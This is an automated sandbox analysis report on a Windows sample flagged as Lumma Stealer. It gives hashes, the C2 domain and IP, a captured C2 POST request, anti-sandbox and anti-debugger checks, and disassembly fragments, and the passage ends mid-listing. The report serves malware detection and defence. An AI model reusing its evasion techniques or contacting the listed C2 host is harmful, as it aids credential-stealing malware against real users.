Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561818
MD5:c7ffd9f68af166bc332ad19be70c3b5c
SHA1:e19af1c281e963bdb378dd17b84706c51a87bb19
SHA256:0b2957e10a9d6c29a680e112571ea46be5fedeac0ecc6f0097337f40d61a4cb1
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C7FFD9F68AF166BC332AD19BE70C3B5C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T11:33:27.539212+010020283713Unknown Traffic192.168.2.849705172.67.162.84443TCP
2024-11-24T11:33:29.516196+010020283713Unknown Traffic192.168.2.849706172.67.162.84443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T11:33:28.262223+010020546531A Network Trojan was detected192.168.2.849705172.67.162.84443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T11:33:28.262223+010020498361A Network Trojan was detected192.168.2.849705172.67.162.84443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00FEBC9D
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_00FECF05
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_00FE98F0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_00FEE0D8
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_00FEC02B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0101C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_0101C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_0101C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0101C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0101B860
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_01000870
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_00FEE970
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0101F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_0101F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0101B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0101B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00FEEA38
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_00FEE35B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00FE5C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00FE5C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_01008CB0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_0101BCE0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_00FEAD00
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_01020F60
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_00FE77D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_00FE77D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_01005E90

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 172.67.162.84:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.162.84:443
Source: Joe Sandbox ViewIP Address: 172.67.162.84 172.67.162.84
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.162.84:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.162.84:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: file.exe, 00000000.00000002.1576433185.0000000001B8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1574657240.0000000001B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m8
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/Q
Source: file.exe, 00000000.00000002.1576433185.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiS
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/q
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49705 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010190300_2_01019030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE89A00_2_00FE89A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FECF050_2_00FECF05
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE98F00_2_00FE98F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEE0D80_2_00FEE0D8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A19640_2_011A1964
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B59B30_2_011B59B3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112E1A40_2_0112E1A4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40400_2_00FE4040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE68400_2_00FE6840
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011949D10_2_011949D1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A69D50_2_011A69D5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010141D00_2_010141D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0147B1990_2_0147B199
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF0020_2_011AF002
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C0400_2_0101C040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE61A00_2_00FE61A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010008700_2_01000870
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEE9700_2_00FEE970
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AA0AD0_2_011AA0AD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101F8D00_2_0101F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101B8E00_2_0101B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE5AC90_2_00FE5AC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE4AC00_2_00FE4AC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEB2100_2_00FEB210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE92100_2_00FE9210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125E27D0_2_0125E27D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE2B800_2_00FE2B80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFFB600_2_00FFFB60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B0AB80_2_011B0AB8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFDB300_2_00FFDB30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011ABAF00_2_011ABAF0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119E2E90_2_0119E2E9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE94D00_2_00FE94D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE6CC00_2_00FE6CC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A85510_2_011A8551
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE5C900_2_00FE5C90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01003D700_2_01003D70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010215800_2_01021580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012265B70_2_012265B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108FDB80_2_0108FDB8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AD5A90_2_011AD5A9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE542C0_2_00FE542C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A34140_2_011A3414
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B247A0_2_011B247A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A0C700_2_011A0C70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE35800_2_00FE3580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01020C800_2_01020C80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01008CB00_2_01008CB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF95300_2_00FF9530
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B74CD0_2_011B74CD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010124E00_2_010124E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEAD000_2_00FEAD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01020F600_2_01020F60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010087700_2_01008770
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C7800_2_0101C780
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010017900_2_01001790
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B3F840_2_011B3F84
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010187B00_2_010187B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A4FC30_2_011A4FC3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DEFF70_2_011DEFF7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007E200_2_01007E20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE77D00_2_00FE77D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE27D00_2_00FE27D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010006500_2_01000650
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005E900_2_01005E90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BB6930_2_010BB693
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992699795081967
Source: file.exeStatic PE information: Section: fwtvsnnj ZLIB complexity 0.9945599099864131
Source: classification engineClassification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010127B0 CoCreateInstance,0_2_010127B0
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exeStatic file information: File size 1867776 > 1048576
Source: file.exeStatic PE information: Raw size of fwtvsnnj is bigger than: 0x100000 < 0x19e000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fwtvsnnj:EW;vcdokcsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fwtvsnnj:EW;vcdokcsv:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x1ccef5 should be: 0x1d6134
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: fwtvsnnj
Source: file.exeStatic PE information: section name: vcdokcsv
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104B179 push edi; mov dword ptr [esp], ecx0_2_0104B18F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104B179 push 63B035C0h; mov dword ptr [esp], ecx0_2_0104B1F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104B179 push 6AF25632h; mov dword ptr [esp], eax0_2_0104B29D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104B179 push 2B666A9Ch; mov dword ptr [esp], ecx0_2_0104B30B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebx; mov dword ptr [esp], edi0_2_011A1983
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push eax; mov dword ptr [esp], 5B79F75Ah0_2_011A19DF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 5C3D0EA0h; mov dword ptr [esp], edi0_2_011A19FB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 17CAFFE1h; mov dword ptr [esp], esi0_2_011A1A5E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebx; mov dword ptr [esp], eax0_2_011A1B37
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 36DB771Bh; mov dword ptr [esp], ebx0_2_011A1B4C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push eax; mov dword ptr [esp], ebx0_2_011A1BE8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 53139CA7h; mov dword ptr [esp], ecx0_2_011A1C54
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push edi; mov dword ptr [esp], esi0_2_011A1CDD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 3EBD3286h; mov dword ptr [esp], ebp0_2_011A1D4D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push esi; mov dword ptr [esp], 55DFC73Bh0_2_011A1D7C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push eax; mov dword ptr [esp], ebx0_2_011A1DA2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 6CCF596Eh; mov dword ptr [esp], ecx0_2_011A1DAA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 6C3D16EAh; mov dword ptr [esp], ecx0_2_011A1DE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 700761F3h; mov dword ptr [esp], ebx0_2_011A1E7B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ecx; mov dword ptr [esp], ebx0_2_011A1E9C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebp; mov dword ptr [esp], ecx0_2_011A1EB1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebp; mov dword ptr [esp], 5BDD07BCh0_2_011A1EB5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 27DC5529h; mov dword ptr [esp], edi0_2_011A1EE5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebx; mov dword ptr [esp], ecx0_2_011A1F26
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebp; mov dword ptr [esp], eax0_2_011A1FE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push edx; mov dword ptr [esp], ebx0_2_011A1FFD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ecx; mov dword ptr [esp], 7D765F1Ah0_2_011A2001
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push edi; mov dword ptr [esp], 2DB3F096h0_2_011A2018
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push 19FE5A3Ch; mov dword ptr [esp], ebx0_2_011A203C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push edi; mov dword ptr [esp], edx0_2_011A2078
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A1964 push ebx; mov dword ptr [esp], edx0_2_011A208D
Source: file.exeStatic PE information: section name: entropy: 7.982113095110462
Source: file.exeStatic PE information: section name: fwtvsnnj entropy: 7.953020845003473

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C9D1 second address: 103C9D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCECA second address: 11BCEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push edx 0x0000000d jns 00007F9668C559D6h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCEE2 second address: 11BCEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCEE8 second address: 11BCEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEB35 second address: 11AEB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEB3E second address: 11AEB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEB42 second address: 11AEB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9668BCCCCDh 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEB5A second address: 11AEB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE8C7 second address: 11BE8FC instructions: 0x00000000 rdtsc 0x00000002 js 00007F9668BCCCC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 js 00007F9668BCCCC6h 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F9668BCCCD1h 0x00000028 jmp 00007F9668BCCCCBh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE8FC second address: 103C9D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a movsx ecx, bx 0x0000000d push dword ptr [ebp+122D1731h] 0x00000013 jbe 00007F9668C559DCh 0x00000019 mov dword ptr [ebp+122D278Ch], eax 0x0000001f call dword ptr [ebp+122D2780h] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 or di, 6651h 0x0000002d xor dword ptr [ebp+122D1D7Ah], ebx 0x00000033 popad 0x00000034 mov esi, dword ptr [ebp+122D3678h] 0x0000003a popad 0x0000003b xor eax, eax 0x0000003d stc 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jbe 00007F9668C559E2h 0x00000048 jbe 00007F9668C559DCh 0x0000004e mov dword ptr [ebp+122D3640h], eax 0x00000054 jo 00007F9668C559EDh 0x0000005a jp 00007F9668C559E7h 0x00000060 mov esi, 0000003Ch 0x00000065 jg 00007F9668C559E2h 0x0000006b jp 00007F9668C559DCh 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 cld 0x00000076 lodsw 0x00000078 jmp 00007F9668C559E2h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 pushad 0x00000082 add dword ptr [ebp+122D1D86h], ebx 0x00000088 popad 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jnp 00007F9668C559ECh 0x00000093 jmp 00007F9668C559E6h 0x00000098 nop 0x00000099 push eax 0x0000009a push edx 0x0000009b jmp 